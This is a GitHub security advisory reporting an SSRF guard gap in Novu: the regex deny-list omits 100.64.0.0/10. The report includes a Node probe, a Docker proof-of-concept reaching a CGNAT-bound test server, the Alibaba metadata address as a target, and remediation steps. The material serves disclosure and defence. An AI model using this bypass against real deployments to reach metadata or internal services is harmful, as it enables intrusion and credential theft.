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GHSA-vg6v-j97m-h5xq
No affected components available
Hi Novu team,
Reporting an SSRF blocklist gap in the shared validateUrlSsrf guard. A complete self-contained reproduction is inlined below — copy the four files into a directory and run docker compose up, plus a single-file probe that runs against Node directly. Locally validated against HEAD 291817c.
Summary
Novu's shared SSRF guard validateUrlSsrf(url) is used before server-side requests to user-configured URLs. The guard resolves hostnames and blocks a regex list of private/reserved IP ranges, but it does not block 100.64.0.0/10 shared address space. As a result, Novu features protected by this guard can still send server-side requests to destinations such as 100.100.100.200 (Alibaba Cloud metadata service) and any other service reachable in 100.64.0.0/10.
Affected code
Guard:
libs/application-generic/src/utils/ssrf-url-validation.tsisPrivateIp(...)regex list at lines 9-28- DNS resolution and address validation at lines 55-72
Product call-sites:
- Workflow HTTP request step:
apps/worker/src/app/workflow/usecases/send-message/execute-http-request-step.usecase.ts— callsvalidateUrlSsrf(url)at line 149, then usesHttpClientServiceto send the request. - Webhook filter condition:
libs/application-generic/src/usecases/conditions-filter/conditions-filter.usecase.ts— callsvalidateUrlSsrf(child.webhookUrl)at line 265, then sendsaxios.post(child.webhookUrl, ...)at line 277.
HTTP client:
libs/application-generic/src/services/http-client/http-client.service.ts— usesgot(gotOptions)at lines 120 and 142 after the preflight validation.
Root cause
The SSRF guard uses a hand-written regex deny-list:
/^0\.0\.0\.0$/i,
/^127\./,
/^10\./,
/^172\.(1[6-9]|2[0-9]|3[01])\./,
/^192\.168\./,
/^169\.254\./,
/^::ffff:127\./i,
/^::ffff:10\./i,
/^::ffff:172\.(1[6-9]|2[0-9]|3[01])\./i,
/^::ffff:192\.168\./i,
/^::ffff:169\.254\./i,
/^::1$/,
/^fc00:/i,
/^fe80:/i,
This list omits 100.64.0.0/10, also called shared address space or CGNAT. These addresses are not RFC1918 private addresses, but they are also not normal public-internet destinations. Cloud and infrastructure providers commonly use special-use address ranges for metadata and internal services; Alibaba Cloud metadata is available at 100.100.100.200.
Reproduction — Part 1: unit-level probe (no Docker required)
Save the following file and run with node novu_ssrf_guard_probe.js. The script replicates validateUrlSsrf from libs/application-generic/src/utils/ssrf-url-validation.ts verbatim (the isPrivateIp regex list is copied as-is) and tests several URL categories.
novu_ssrf_guard_probe.js
const dns = require('dns/promises');
function isPrivateIp(ip) {
const privateRanges = [
/^0\.0\.0\.0$/i,
/^127\./,
/^10\./,
/^172\.(1[6-9]|2[0-9]|3[01])\./,
/^192\.168\./,
/^169\.254\./,
/^::ffff:127\./i,
/^::ffff:10\./i,
/^::ffff:172\.(1[6-9]|2[0-9]|3[01])\./i,
/^::ffff:192\.168\./i,
/^::ffff:169\.254\./i,
/^::1$/,
/^fc00:/i,
/^fe80:/i,
];
return privateRanges.some((range) => range.test(ip));
}
async function validateUrlSsrf(url) {
let parsed;
try {
parsed = new URL(url);
} catch {
return 'Invalid URL format.';
}
if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') {
return `URL scheme "${parsed.protocol}" is not allowed.`;
}
const hostname = parsed.hostname.toLowerCase();
const blockedHostnames = ['localhost', 'metadata.google.internal'];
if (blockedHostnames.includes(hostname)) {
return `Requests to "${hostname}" are not allowed.`;
}
let addresses;
try {
addresses = await dns.lookup(hostname, { all: true });
} catch {
return `Unable to resolve hostname "${hostname}".`;
}
for (const { address } of addresses) {
if (isPrivateIp(address)) {
return `Requests to private or reserved IP addresses are not allowed (resolved: ${address}).`;
}
}
return null;
}
async function main() {
for (const url of [
'http://127.0.0.1/',
'http://0.0.0.0/',
'http://0.0.0.1/',
'http://169.254.169.254/',
'http://100.64.0.1/',
'http://100.100.100.200/',
'http://224.0.0.1/',
'http://[fd00::1]/',
'http://[64:ff9b::7f00:1]/',
'http://[::ffff:100.64.0.1]/',
'http://8.8.8.8/',
]) {
console.log(JSON.stringify({ url, verdict: (await validateUrlSsrf(url)) ?? 'ALLOW' }));
}
}
main().catch((e) => { console.error(e); process.exitCode = 1; });
Expected output (relevant lines)
{"url":"http://127.0.0.1/","verdict":"Requests to private or reserved IP addresses are not allowed (resolved: 127.0.0.1)."}
{"url":"http://169.254.169.254/","verdict":"Requests to private or reserved IP addresses are not allowed (resolved: 169.254.169.254)."}
{"url":"http://100.64.0.1/","verdict":"ALLOW"}
{"url":"http://100.100.100.200/","verdict":"ALLOW"}
{"url":"http://8.8.8.8/","verdict":"ALLOW"}
The 2nd and 3rd ALLOW rows are the bypass — both are non-public destinations the guard should refuse.
Reproduction — Part 2: end-to-end Docker CGNAT proof
Save the three files below into a directory, then:
docker compose up --abort-on-container-exit --exit-code-from novu-client
This mirrors the product sequence in execute-http-request-step.usecase.ts: resolve hostname → validate with validateUrlSsrf → send HTTP request. The "target" container is bound to a CGNAT address (100.64.0.20) on a custom subnet, simulando a cloud-internal service reachable on the CGNAT range.
docker-compose.yml
services:
cgnat-target:
image: python:3.12-alpine
command: python -u /srv/target.py
volumes:
- ./target.py:/srv/target.py:ro
networks:
novu-cgnat:
ipv4_address: 100.64.0.20
novu-client:
image: node:22-alpine
command: node /srv/client.js
volumes:
- ./client.js:/srv/client.js:ro
depends_on:
- cgnat-target
networks:
novu-cgnat:
ipv4_address: 100.64.0.10
networks:
novu-cgnat:
ipam:
config:
- subnet: 100.64.0.0/24
target.py
from http.server import BaseHTTPRequestHandler, HTTPServer
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
print(f"[target] {self.client_address[0]} POST {self.path}", flush=True)
self.send_response(200)
self.send_header("content-type", "application/json")
self.end_headers()
self.wfile.write(b'{"marker":"NOVU_CGNAT_SSRF_OK"}\n')
def log_message(self, fmt, *args): return
HTTPServer(("100.64.0.20", 8080), Handler).serve_forever()
client.js
const dns = require('dns/promises');
function isPrivateIp(ip) {
const privateRanges = [
/^0\.0\.0\.0$/i, /^127\./, /^10\./,
/^172\.(1[6-9]|2[0-9]|3[01])\./, /^192\.168\./, /^169\.254\./,
/^::ffff:127\./i, /^::ffff:10\./i,
/^::ffff:172\.(1[6-9]|2[0-9]|3[01])\./i,
/^::ffff:192\.168\./i, /^::ffff:169\.254\./i,
/^::1$/, /^fc00:/i, /^fe80:/i,
];
return privateRanges.some((range) => range.test(ip));
}
async function validateUrlSsrf(url) {
const parsed = new URL(url);
if (!['http:', 'https:'].includes(parsed.protocol)) return 'bad scheme';
if (['localhost', 'metadata.google.internal'].includes(parsed.hostname.toLowerCase())) {
return 'blocked hostname';
}
const addresses = await dns.lookup(parsed.hostname, { all: true });
for (const { address } of addresses) {
if (isPrivateIp(address)) return `blocked ${address}`;
}
return null;
}
async function waitForTarget(url) {
for (let attempt = 0; attempt < 20; attempt += 1) {
try {
const r = await fetch(url, { method: 'POST' });
await r.text();
return;
} catch (_e) {
await new Promise((resolve) => setTimeout(resolve, 250));
}
}
}
async function main() {
const url = 'http://cgnat-target:8080/workflow-http-step';
const addresses = await dns.lookup('cgnat-target', { all: true });
const validation = await validateUrlSsrf(url);
console.log(JSON.stringify({ url, addresses, validation: validation ?? 'ALLOW' }));
if (validation) { process.exitCode = 2; return; }
await waitForTarget(url);
const response = await fetch(url, {
method: 'POST',
headers: { 'content-type': 'application/json' },
body: JSON.stringify({ source: 'novu-http-request-step' }),
});
const body = await response.text();
console.log(JSON.stringify({ status: response.status, body }));
}
main().catch((e) => { console.error(e); process.exitCode = 1; });
Expected output
novu-client-1 | {"url":"http://cgnat-target:8080/workflow-http-step","addresses":[{"address":"100.64.0.20","family":4}],"validation":"ALLOW"}
cgnat-target-1 | [target] 100.64.0.10 POST /workflow-http-step
novu-client-1 | {"status":200,"body":"{\"marker\":\"NOVU_CGNAT_SSRF_OK\"}\n"}
The chain is:
- Resolve hostname
cgnat-target→100.64.0.20(a CGNAT address). - Run Novu's
validateUrlSsrfagainst the URL — returnsALLOWbecause100.64.0.0/10is missing fromisPrivateIp. - Send the actual server-side HTTP POST → reaches the CGNAT-bound target → response with marker
NOVU_CGNAT_SSRF_OKis received.
Impact
Any Novu feature that allows a user to configure an outbound HTTP URL and relies on validateUrlSsrf may still reach 100.64.0.0/10. Impact is highest for:
- Alibaba Cloud deployments, where
http://100.100.100.200/latest/meta-data/may expose instance metadata. - Self-hosted deployments where
100.64.0.0/10routes to private infrastructure, service meshes, VPNs, carrier-grade NAT, or provider-side internal services. - Multi-tenant deployments where one tenant can configure workflow HTTP request steps or webhook filters that execute from shared worker/API infrastructure — cross-tenant SSRF primitive into provider-internal services.
Suggested remediation
- Replace regex matching with IP parsing and CIDR classification, e.g. using
ipaddr.jswithprocess(...)to normalize IPv4-mapped IPv6. - Treat only globally reachable public IPs as allowed by default (
addr.range() === 'unicast'after IPv4-mapped unwrap, or equivalent). - Explicitly deny all special-use ranges, including at least:
0.0.0.0/8,10.0.0.0/8,100.64.0.0/10,127.0.0.0/8,169.254.0.0/16,172.16.0.0/12,192.168.0.0/16- multicast (
224.0.0.0/4), documentation (192.0.2.0/24,198.51.100.0/24,203.0.113.0/24,2001:db8::/32), benchmarking (198.18.0.0/15), reserved (240.0.0.0/4) - IPv6 ULA (
fc00::/7), link-local (fe80::/10), loopback (::1), and the IPv4-mapped variants of all of the above
- Add regression tests for:
100.64.0.1,100.100.100.200- hostnames resolving to those addresses
- IPv4-mapped variants of denied IPv4 ranges (e.g.,
::ffff:100.64.0.1)
- Consider connection-time validation or a guarded lookup agent so the actual request cannot resolve to a different IP than the preflight checked (DNS-rebinding TOCTOU mitigation).
Notes
This report is intentionally scoped to the concrete 100.64.0.0/10 bypass. Additional missed ranges exist in the current regex guard (multicast 224.0.0.0/4, broadcast 255.255.255.255, benchmarking, documentation, 0.0.0.0/8 outside /32, and IPv4-mapped variants), but CGNAT is the highest-confidence real-world issue because it includes a known cloud metadata endpoint (100.100.100.200 on Alibaba Cloud).
The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker needs basic access or low-level privileges. The attacker needs the user to perform some action, like clicking a link. The vulnerability can affect other systems as well, not just the initial system. There is a high impact on the confidentiality of the information.
Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.
Probability that this vulnerability will be exploited in the wild within the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
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